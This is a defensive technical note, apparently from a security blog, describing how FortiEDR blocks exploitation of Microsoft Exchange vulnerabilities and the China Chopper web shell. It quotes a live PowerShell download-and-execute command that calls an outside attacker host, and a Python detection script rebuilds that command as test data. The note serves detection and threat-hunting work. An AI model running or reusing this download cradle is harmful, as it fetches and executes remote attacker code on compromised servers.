Technical note on FortiEDR
Description
Threat actors are actively exploiting the recent remote code execution vulnerabilities in MS Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019.
With the latest FortiEDR versions (v4 or v5) installed on your MS Exchange host (Windows Server), you are protected against the zero-day exploit, and you can also obtain information on whether anyone has attempted to exploit it.
In this operation, four specific vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) are chained together to allow the threat actor to exploit on-premise Exchange servers. The attack chain targets a Microsoft Exchange server that is able to receive untrusted connections from an external source.
After exploiting these vulnerabilities to gain initial access, attackers deployed web shells on the compromised servers. Web shells potentially allow attackers to steal data and perform other malicious activities that lead to further compromise.
FortiEDR detects and blocks the web shells from executing, thereby defusing the exploit.
Pre-Execution
FortiEDR blocked the adversaries' attempt to drop web shells on the vulnerable on-premise Exchange servers. The web shell “discover.aspx” with the following script was blocked. After dropping the web shell, the attacker would send a POST request to it, passing the malicious commands in the parameter “Ananas”.
Rules Triggered
The threat was marked as “MSIL/Chopper.Altr”, as this web shell, also known as China Chopper, was commonly used by malicious Chinese actors. The rule “Malicious File Detected” was triggered with the following automated analysis comment.
“The file was identified as malicious by our machine-learning engine or by other means, based on analysis of the file.”
In this instance, FortiEDR blocked the w3wp.exe process from creating a web shell on a vulnerable Exchange server.
Post-Execution
FortiEDR blocked the exploitation activity of these web shells. w3wp.exe (the IIS process associated with the Exchange web front end) spawning cmd.exe to run PowerShell to download additional payloads was blocked.
Rules Triggered
The policy and rule “Suspicious Application” were triggered with the following automated analysis comment.
“Fileless malware detected. Attempt to download and execute a remote command using powershell from a suspicious context. A base64 encoded code was executed on the system using powershell.exe. The command -enc was executed using PowerShell. The decoded command is: IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e').”
Threat Hunting
FortiEDR’s (v5) Threat Hunting feature enables you to conduct further investigation. The following query helps to identify web shell usage, and it can also be scheduled to run automatically to notify on events that match the query.
Type:"Process Creation" AND Source.Process.Name:"w3wp.exe" AND Target.Process.Name:"cmd.exe"
Default FortiEDR and FortiXDR deployments detect and block post-exploitation activity, including dumping the LSASS memory and running the Nishang and PowerCat tools described in the Microsoft blog.
The latest FortiEDR v4.x and 5.x versions successfully detect and block the exploitation of Microsoft Exchange Server.
IOC: 1e0803ffc283dd04279bf3351b92614325e643564ed5b4004985eb0486bf44ee
For additional information, please refer to the following blogs
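The hunting query above and the “Suspicious Application” rule both key on the IIS worker process w3wp.exe as the parent. The script below is an added example (not FortiEDR code) that applies the same two conditions to constructed process and file events and decodes the PowerShell -enc argument so the download cradle can be read in the alert; the event field names for file creation (Type “File Create”, Target.File.Path) and the web shell path are assumptions for the demo.

```python
import base64
import re

# Constructed sample events shaped like the FortiEDR hunting fields the page
# uses (Type, Source.Process.Name, Target.Process.Name). The file-event fields
# (Target.File.Path, "File Create") and the path are assumptions for the demo.
PAYLOAD = "IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

EVENTS = [
    {"Type": "Process Creation", "Source.Process.Name": "w3wp.exe",
     "Target.Process.Name": "cmd.exe",
     "Target.Process.CommandLine": "cmd.exe /c powershell.exe -enc " + ENCODED},
    {"Type": "File Create", "Source.Process.Name": "w3wp.exe",
     "Target.File.Path": r"C:\assumed\webroot\discover.aspx"},
    {"Type": "Process Creation", "Source.Process.Name": "explorer.exe",
     "Target.Process.Name": "cmd.exe", "Target.Process.CommandLine": "cmd.exe /c dir"},
]


def decode_enc(cmdline):
    """Decode a PowerShell -enc/-EncodedCommand argument (base64 of UTF-16LE)."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command


def hunt(events):
    """Return (rule, detail, decoded_command) for events matching the page's hunts."""
    findings = []
    for ev in events:
        if ev.get("Source.Process.Name", "").lower() != "w3wp.exe":
            continue  # both hunts hinge on the IIS worker process as parent
        child = ev.get("Target.Process.Name", "").lower()
        if ev["Type"] == "Process Creation" and child in ("cmd.exe", "powershell.exe"):
            decoded = decode_enc(ev.get("Target.Process.CommandLine", ""))
            findings.append(("w3wp.exe spawned shell", child, decoded))
        elif ev["Type"] == "File Create" and ev.get("Target.File.Path", "").lower().endswith(".aspx"):
            findings.append(("w3wp.exe wrote .aspx", ev["Target.File.Path"], None))
    return findings


if __name__ == "__main__":
    for rule, detail, decoded in hunt(EVENTS):
        print(rule, "|", detail, "|", decoded)
```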
Leave us any questions about FortiEDR below!
Hi, we are Mila Jiménez and César Sánchez, two cybersecurity enthusiasts with many years of experience. We have worked at many companies in the IT world and now we want to share our knowledge with anyone who needs it.